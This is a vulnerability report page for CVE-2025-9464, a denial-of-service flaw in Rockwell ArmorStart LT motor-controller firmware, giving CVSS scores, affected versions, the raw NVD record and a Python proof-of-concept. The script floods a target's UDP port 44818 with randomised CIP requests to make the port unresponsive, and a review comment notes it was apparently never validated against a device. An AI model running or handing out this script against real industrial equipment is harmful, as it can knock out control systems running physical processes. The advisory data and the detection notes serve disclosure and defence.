Security Vulnerability Report
CVE-2025-9464 CVSS 7.5 HIGH

CVE-2025-9464

Published: 2026-01-20 14:16:15
Last Modified: 2026-02-02 18:08:48

Description

A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. This vulnerability is triggered during fuzzing of multiple CIP classes, which causes the CIP port to become unresponsive.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:rockwellautomation:armorstart_lt_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:rockwellautomation:armorstart_lt:-:*:*:*:*:*:*:* - NOT VULNERABLE
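ArmorStart LT (this summary gives no version; the NVD record under "Raw JSON Data" lists firmware versions up to and including 2.002 as affected — refer to the vendor advisory for the exact versions)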

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
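#!/usr/bin/env python3
"""
CVE-2025-9464 PoC - ArmorStart LT CIP Fuzzing DoS

Note: This PoC is for educational and authorized testing purposes only.

Traffic shape, for anyone reading a capture or writing a detection:
the script emits UDP datagrams to port 44818 (by default), each made of
one service byte, the four path bytes ``0x20 <class> 0x24 <instance>``
and 10-100 random bytes.  Service, class and instance are picked at
random for every datagram.

NOTE(review): nothing on the page shows that this script was validated
against a device; read it as a sketch of the traffic shape rather than a
verified reproducer.  The NVD record on the same page lists ArmorStart LT
firmware up to and including 2.002 as affected and links Rockwell
Automation advisory SD1768.
"""

import random
import socket
import struct  # not used by this listing; kept because the original imports it
import sys


def create_cip_rr_data_request(service, class_id, instance_id, data=b''):
    """Build the byte string that is sent in each datagram.

    Layout: ``service``, ``0x20``, ``class_id``, ``0x24``, ``instance_id``,
    followed by ``data`` unchanged.

    Args:
        service: Service code, an int in 0-255.  For reference, the CIP
            common services include 0x01 Get_Attributes_All,
            0x0E Get_Attribute_Single and 0x10 Set_Attribute_Single.
        class_id: Class identifier, an int in 0-255.
        instance_id: Instance identifier, an int in 0-255.
        data: Extra bytes (or an iterable of ints in 0-255) appended after
            the path.

    Returns:
        The assembled request as ``bytes``.

    Raises:
        ValueError: If any of the integer fields is outside 0-255.
    """
    # 0x20 / 0x24 are the 8-bit class and instance logical-segment markers.
    request = bytearray([service, 0x20, class_id, 0x24, instance_id])
    request.extend(data)
    return bytes(request)


def send_cip_fuzz_packet(target_ip, target_port=44818, iterations=100):
    """Send ``iterations`` randomised datagrams to ``target_ip:target_port``.

    No reply is ever read, so this function cannot tell whether the target
    is still responsive; the progress lines only report datagrams that were
    handed to the local network stack.

    Args:
        target_ip: Destination address passed to ``sendto``.
        target_port: Destination UDP port (default 44818).
        iterations: Number of datagrams to send.
    """
    print(f"[*] Starting CIP fuzzing against {target_ip}:{target_port}")

    service_codes = [0x01, 0x04, 0x0C, 0x10, 0x4C, 0x4D]

    # The context manager closes the socket even when the loop is
    # interrupted (Ctrl-C) or an unexpected exception escapes.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        # Nothing is received, so the timeout only bounds a blocking send.
        sock.settimeout(5)

        for i in range(iterations):
            service = random.choice(service_codes)
            class_id = random.randint(0x01, 0xFF)
            instance_id = random.randint(0x01, 0xFF)

            # 10-100 random bytes appended after the path.
            fuzz_len = random.randint(10, 100)
            fuzz_data = bytes(random.randint(0, 255) for _ in range(fuzz_len))

            cip_payload = create_cip_rr_data_request(
                service, class_id, instance_id, fuzz_data
            )

            try:
                sock.sendto(cip_payload, (target_ip, target_port))
            except OSError as e:
                # Socket-level failures (unreachable network, bad address,
                # timeout) are reported and the loop carries on.
                print(f"[!] Error sending packet: {e}")
            else:
                print(f"[*] Sent fuzz packet {i+1}/{iterations}")

    print("[*] Fuzzing completed")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2025-9464-poc.py <target_ip>")
        sys.exit(1)

    send_cip_fuzz_packet(sys.argv[1])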

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9464", "sourceIdentifier": "[email protected]", "published": "2026-01-20T14:16:15.173", "lastModified": "2026-02-02T18:08:48.220", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. This vulnerability is triggered during fuzzing of multiple CIP classes, which causes the CIP port to become unresponsive."}, {"lang": "es", "value": "Existe un problema de seguridad en ArmorStart® LT que puede resultar en una condición de denegación de servicio. Esta vulnerabilidad se activa durante el fuzzing de múltiples clases CIP, lo que provoca que el puerto CIP deje de responder."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:rockwellautomation:armorstart_lt_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.002", "matchCriteriaId": "564CE3DE-2D80-4511-B970-C644C7217F20"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:rockwellautomation:armorstart_lt:-:*:*:*:*:*:*:*", "matchCriteriaId": "E8AB2017-CB37-4A93-90FD-7FE82640FB77"}]}]}], "references": [{"url": "https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}